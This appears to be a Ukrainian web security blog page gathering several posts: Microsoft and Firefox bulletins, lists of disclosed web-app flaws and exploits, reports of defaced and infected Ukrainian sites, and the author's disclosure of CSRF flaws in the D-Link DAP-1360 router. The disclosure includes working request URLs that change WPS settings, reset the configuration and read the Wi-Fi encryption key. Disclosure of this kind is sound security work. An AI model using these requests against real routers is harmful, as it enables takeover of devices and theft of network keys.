Websecurity - Веб безпека

Виявлені уразливості безпеки в Microsoft Exchange Server.

Уразливі продукти: Microsoft Exchange Server 2013, Microsoft Exchange Server 2013 SP1, Microsoft Exchange Server 2016.

Підробка вмісту, зокрема підробка адреси в Outlook Web Access.

• Microsoft Security Bulletin MS16-010 - Important Security Update in Microsoft Exchange Server to Address Spoofing (3124557) (деталі)

В даній добірці уразливості в веб додатках:

• ClassLoader manipulation issue confirmed for Struts 1 (деталі)
• Struts 1 - Mitigation Advice Available, Possible RCE Impact (деталі)
• drupal7 security update (деталі)
• Multiple SQL Injection in SP Client Document Manager plugin (деталі)
• Struts 2.3.16.3 GA release available - security fix (деталі)

У грудні, 18.12.2015, вийшов Mozilla Firefox 43.0.1, а 22.12.2015 вийшов Mozilla Firefox 43.0.2. Нові версії браузера вийшли через декілька днів після виходу Firefox 43.

Це багфікс і секюріті випуски в яких зроблене покращення і виправлена уразливість. У версії 43.0.1 зроблена підготовка до використання SHA-256 підписуючих сертифікатів для Windows версій браузера. У версії 43.0.2 використаний SHA-256 сертифікат для Windows версій браузера. Також виправлена одна уразливість в Firefox 43.0.2 і Firefox ESR 38.6.

• MFSA 2015-150 MD5 signatures accepted within TLS 1.2 ServerKeyExchange in server signature (деталі)

Відбувся четвертий масовий взлом сайтів на сервері Hvosting. Він тривав на протязі 2010-2015 років: з 05.04.2010 до 03.07.2015. Третій масовий взлом сайтів на сервері Hvosting відбувся раніше.

Був взломаний сервер української компанії Hvosting. Взлом складався з двох масових дефейсів та багатьох окремих дефейсів. Вони відбулися паралельно до масового взлому сервера Ukraine.

Всього було взломано 40 сайтів на сервері хостера Hvosting (IP 91.200.40.32). Перелік сайтів можете подивитися на www.zone-h.org.

З зазначених 40 сайтів 8 сайтів були взломані хакером HighTech, 7 сайтів хакером jangene_cakep та інші сайти різними хакерами.

Масові дефейси хакерами HighTech і jangene_cakep явно були зроблені через взлом серверу хостінг провайдера. У випадку окремих дефейсів по одному або декілька сайтів, всі вони явно були зроблені при взломах окремих сайтів. Але також можлива атака на інші сайти на даному сервері через взлом одного сайту та використання уразливостей в програмному забезпеченні сервера.

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

CSRF (WASC-09):

В розділі Wi-Fi - WPS можна змінити параметр WPS Enable:

Увімкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}

Вимкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}

Можна відмінити конфігурацію (Reset to unconfigured):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}

Можна прочитати дані про конфігурацію в Information - Refresh. Через XSS атаку з цієї сторінки можна отримати дані про ключ Encryption key (це спрацює навіть при вимкненому WPS):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0

Можна змінити метод в Connection - WPS Method:

PBC:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}

PIN:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

В даній добірці експлоіти в веб додатках:

• NXFilter 3.0.3 - Multiple XSS Vulnerabilities (деталі)
• NXFilter 3.0.3 - CSRF Vulnerabilities (деталі)
• Google AdWords <= 6.2.0 API client libraries - XML eXternal Entity Injection (XXE) (деталі)
• Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload (деталі)
• D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://gp.gov.ua - інфікований державний сайт - інфекція була виявлена 26.01.2016. Зараз сайт не входить до переліку підозрілих.
• http://prof-legion.com.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
• http://medsvit.com.ua - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://2service.com.ua - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://kino-planeta.com - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
• http://redhost.info - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://atmedia.com.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
• http://7ba.org - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://akciiskidki.com - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://architector.dp.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.

Виявлена можливість виконання коду в Microsoft Silverlight.

Уразливі продукти: Microsoft Silverlight 5 для Windows і Mac до версії 5.1.41212.0.

Виконання коду в браузерах з плагіном Silverlight.

• Microsoft Security Bulletin MS16-006 - Critical Security Update for Silverlight to Address Remote Code Execution (3126036) (деталі)

В даній добірці уразливості в веб додатках:

• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code (деталі)
• Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension (деталі)
• Multiple SQL Injections in Dolibarr ERP & CRM (деталі)
• Vulnerability in php-ZendFramework (деталі)
• Struts 2.3.16.2 GA release available - security fix (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Newsletter, Download Manager, Yoast Google Analytics і темі Daily Edition. Для котрих з’явилися експлоіти.

• WordPress Newsletter 2.6.x / 2.5.x Open Redirect (деталі)
• WordPress Download Manager 2.7.2 Privilege Escalation (деталі)
• WordPress Yoast Google Analytics 5.3.2 Cross Site Scripting (деталі)
• WordPress Daily Edition 1.6.2 SQL Injection (деталі)
• WordPress Daily Edition Theme 1.6.2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.